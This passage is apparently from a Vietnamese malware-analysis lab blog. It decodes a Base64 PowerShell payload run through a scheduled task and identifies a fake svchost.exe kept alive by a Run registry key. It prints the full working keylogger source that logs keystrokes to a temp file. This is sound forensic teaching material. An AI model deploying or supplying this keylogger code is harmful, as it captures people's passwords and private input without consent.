AbABkAGUAcgAgAHAAdwBzAHoAQgB1AGYAZgAsACAAaQBuAHQAIABjAGMAaABCAHUAZgBmACwAIAB1AGkAbgB0ACAAdwBGAGwAYQBnAHMAKQA7AAoAJwBAAAoACgAgACAAIwAgAGwAbwBhAGQAIABzAGkAZwBuAGEAdAB1AHIAZQBzACAAYQBuAGQAIABtAGEAawBlACAAbQBlAG0AYgBlAHIAcwAgAGEAdgBhAGkAbABhAGIAbABlAAoAIAAgACQAQQBQAEkAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBNAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABzAGkAZwBuAGEAdAB1AHIAZQBzACAALQBOAGEAbQBlACAAJwBXAGkAbgAzADIAJwAgAC0ATgBhAG0AZQBzAHAAYQBjAGUAIABBAFAASQAgAC0AUABhAHMAcwBUAGgAcgB1AAoAIAAgACAAIAAKACAAIAAjACAAYwByAGUAYQB0AGUAIABvAHUAdABwAHUAdAAgAGYAaQBsAGUACgAgACAAJABuAHUAbABsACAAPQAgAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAUABhAHQAaAAgAC0ASQB0AGUAbQBUAHkAcABlACAARgBpAGwAZQAgAC0ARgBvAHIAYwBlAAoACgAgACAAdAByAHkACgAgACAAewAKACAAIAAgACAAIwBXAHIAaQB0AGUALQBIAG8AcwB0ACAAJwBSAGUAYwBvAHIAZABpAG4AZwAgAGsAZQB5ACAAcAByAGUAcwBzAGUAcwAuACAAUAByAGUAcwBzACAAQwBUAFIATAArAEMAIAB0AG8AIABzAGUAZQAgAHIAZQBzAHUAbAB0AHMALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAAoACgAgACAAIAAgACMAIABjAHIAZQBhAHQAZQAgAGUAbgBkAGwAZQBzAHMAIABsAG8AbwBwAC4AIABXAGgAZQBuACAAdQBzAGUAcgAgAHAAcgBlAHMAcwBlAHMAIABDAFQAUgBMACsAQwAsACAAZgBpAG4AYQBsAGwAeQAtAGIAbABvAGMAawAKACAAIAAgACAAIwAgAGUAeABlAGMAdQB0AGUAcwAgAGEAbgBkACAAcwBoAG8AdwBzACAAdABoAGUAIABjAG8AbABsAGUAYwB0AGUAZAAgAGsAZQB5ACAAcAByAGUAcwBzAGUAcwAKACAAIAAgACAAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQAgAHsACgAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAE0AaQBsAGwAaQBzAGUAYwBvAG4AZABzACAANAAwAAoAIAAgACAAIAAgACAACgAgACAAIAAgACAAIAAjACAAcwBjAGEAbgAgAGEAbABsACAAQQBTAEMASQBJACAAYwBvAGQAZQBzACAAYQBiAG8AdgBlACAAOAAKACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGEAcwBjAGkAaQAgAD0AIAA5ADsAIAAkAGEAcwBjAGkAaQAgAC0AbABlACAAMgA1ADQAOwAgACQAYQBzAGMAaQBpACsAKwApACAAewAKACAAIAAgACAAIAAgACAAIAAjACAAZwBlAHQAIABjAHUAcgByAGUAbgB0ACAAawBlAHkAIABzAHQAYQB0AGUACgAgACAAIAAgACAAIAAgACAAJABzAHQAYQB0AGUAIAA9ACAAJABBAFAASQA6ADoARwBlAHQAQQBzAHkAbgBjAEsAZQB5AFMAdABhAHQAZQAoACQAYQBzAGMAaQBpACkACgAKACAAIAAgACAAIAAgACAAIAAjACAAaQBzACAAawBlAHkAIABwAHIAZQBzAHMAZQBkAD8ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAHMAdABhAHQAZQAgAC0AZQBxACAALQAzADIANwA2ADcAKQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACQAbgB1AGwAbAAgAD0AIABbAGMAbwBuAHMAbwBsAGUAXQA6ADoAQwBhAHAAcwBMAG8AYwBrAAoACgAgACAAIAAgACAAIAAgACAAIAAgACMAIAB0AHIAYQBuAHMAbABhAHQAZQAgAHMAYwBhAG4AIABjAG8AZABlACAAdABvACAAcgBlAGEAbAAgAGMAbwBkAGUACgAgACAAIAAgACAAIAAgACAAIAAgACQAdgBpAHIAdAB1AGEAbABLAGUAeQAgAD0AIAAkAEEAUABJADoAOgBNAGEAcABWAGkAcgB0AHUAYQBsAEsAZQB5ACgAJABhAHMAYwBpAGkALAAgADMAKQAKAAoAIAAgACAAIAAgACAAIAAgACAAIAAjACAAZwBlAHQAIABrAGUAeQBiAG8AYQByAGQAIABzAHQAYQB0AGUAIABmAG8AcgAgAHYAaQByAHQAdQBhAGwAIABrAGUAeQBzAAoAIAAgACAAIAAgACAAIAAgACAAIAAkAGsAYgBzAHQAYQB0AGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEIAeQB0AGUAWwBdACAAMgA1ADYACgAgACAAIAAgACAAIAAgACAAIAAgACQAYwBoAGUAYwBrAGsAYgBzAHQAYQB0AGUAIAA9ACAAJABBAFAASQA6ADoARwBlAHQASwBlAHkAYgBvAGEAcgBkAFMAdABhAHQAZQAoACQAawBiAHMAdABhAHQAZQApAAoACgAgACAAIAAgACAAIAAgACAAIAAgACMAIABwAHIAZQBwAGEAcgBlACAAYQAgAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIAB0AG8AIAByAGUAYwBlAGkAdgBlACAAaQBuAHAAdQB0ACAAawBlAHkACgAgACAAIAAgACAAIAAgACAAIAAgACQAbQB5AGMAaABhAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAKAAoAIAAgACAAIAAgACAAIAAgACAAIAAjACAAdAByAGEAbgBzAGwAYQB0AGUAIAB2AGkAcgB0AHUAYQBsACAAawBlAHkACgAgACAAIAAgACAAIAAgACAAIAAgACQAcwB1AGMAYwBlAHMAcwAgAD0AIAAkAEEAUABJADoAOgBUAG8AVQBuAGkAYwBvAGQAZQAoACQAYQBzAGMAaQBpACwAIAAkAHYAaQByAHQAdQBhAGwASwBlAHkALAAgACQAawBiAHMAdABhAHQAZQAsACAAJABtAHkAYwBoAGEAcgAsACAAJABtAHkAYwBoAGEAcgAuAEMAYQBwAGEAYwBpAHQAeQAsACAAMAApAAoACgAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABzAHUAYwBjAGUAcwBzACkAIAAKACAAIAAgACAAIAAgACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAIABhAGQAZAAgAGsAZQB5ACAAdABvACAAbABvAGcAZwBlAHIAIABmAGkAbABlAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAQQBwAHAAZQBuAGQAQQBsAGwAVABlAHgAdAAoACQAUABhAHQAaAAsACAAJABtAHkAYwBoAGEAcgAsACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQApACAACgAgACAAIAAgACAAIAAgACAAIAAgAH0ACgAgACAAIAAgACAAIAAgACAAfQAKACAAIAAgACAAIAAgAH0ACgAgACAAIAAgAH0ACgAgACAAfQAKACAAIABmAGkAbgBhAGwAbAB5AAoAIAAgAHsACgAgACAAIAAgACMAIABvAHAAZQBuACAAbABvAGcAZwBlAHIAIABmAGkAbABlACAAaQBuACAATgBvAHQAZQBwAGEAZAAKACAAIAAgACAAIwAgAG4AbwB0AGUAcABhAGQAIAAkAFAAYQB0AGgACgAgACAAfQAKAH0ACgAKACMAIAByAGUAYwBvAHIAZABzACAAYQBsAGwAIABrAGUAeQAgAHAAcgBlAHMAcwBlAHMAIAB1AG4AdABpAGwAIABzAGMAcgBpAHAAdAAgAGkAcwAgAGEAYgBvAHIAdABlAGQAIABiAHkAIABwAHIAZQBzAHMAaQBuAGcAIABDAFQAUgBMACsAQwAKACMAIAB3AGkAbABsACAAdABoAGUAbgAgAG8AcABlAG4AIAB0AGgAZQAgAGYAaQBsAGUAIAB3AGkAdABoACAAYwBvAGwAbABlAGMAdABlAGQAIABrAGUAeQAgAGMAbwBkAGUAcwAKAFMAdABhAHIAdAAtAEsAZQB5AEwAbwBnAGcAZQByAA

Vẫn là motip quen thuộc từ các lab trước. Mình sẽ decode đoạn Base64 ra để đọc code

Đoạn code thu được:

#requires -Version 2
function Start-KeyLogger($Path="$env:temp\logfile.txt") 
{
  # Signatures for API Calls
  $signatures = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 
public static extern short GetAsyncKeyState(int virtualKeyCode); 
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@

  # load signatures and make members available
  $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
    
  # create output file
  $null = New-Item -Path $Path -ItemType File -Force

  try
  {
    #Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red

    # create endless loop. When user presses CTRL+C, finally-block
    # executes and shows the collected key presses
    while ($true) {
      Start-Sleep -Milliseconds 40
      
      # scan all ASCII codes above 8
      for ($ascii = 9; $ascii -le 254; $ascii++) {
        # get current key state
        $state = $API::GetAsyncKeyState($ascii)

        # is key pressed?
        if ($state -eq -32767) {
          $null = [console]::CapsLock

          # translate scan code to real code
          $virtualKey = $API::MapVirtualKey($ascii, 3)

          # get keyboard state for virtual keys
          $kbstate = New-Object Byte[] 256
          $checkkbstate = $API::GetKeyboardState($kbstate)

          # prepare a StringBuilder to receive input key
          $mychar = New-Object -TypeName System.Text.StringBuilder

          # translate virtual key
          $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)

          if ($success) 
          {
            # add key to logger file
            [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) 
          }
        }
      }
    }
  }
  finally
  {
    # open logger file in Notepad
    # notepad $Path
  }
}

# records all key presses until script is aborted by pressing CTRL+C
# will then open the file with collected key codes
Start-KeyLogger

Đây thì chỉ đơn giản là một chương trình Keylogger.

Kết luận:

Mã độc nằm trong Task \Microsoft\Windows\Window Events của Task Scheduler.

Kỹ thuật persitent: Sử dụng Task Scheduler để chạy PowerShell thực thi Keylogger.

Cách gỡ mã độc: Xóa task trong Task Scheduler đi.

Lab 20

Recon:

Với lab này, khi mở Autoruns lên, mình đã thấy có file svchost.exe được đặt ở vị trí có vẻ không đúng lắm

Vì vậy, mình đã lấy ra hash của file này và đem kiểm tra trên VirusTotal

Đây là kết quả thu được

Kết luận:

Mã độc nằm ở đường dẫn: C:\Users\hunter\AppData\Roaming\WPDNSE\svchost.exe.

Kỹ thuật persistent: Ghi giá trị vào Registry HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Atapi x86_64 Driver.

Cách gỡ mã độc: Xóa file và giá trị trong Registry đi.

© 2024,Pham Quoc Trung. All rights reserved.

PreviousMalware AnalysisNextCobalt Strike Lab

Last updated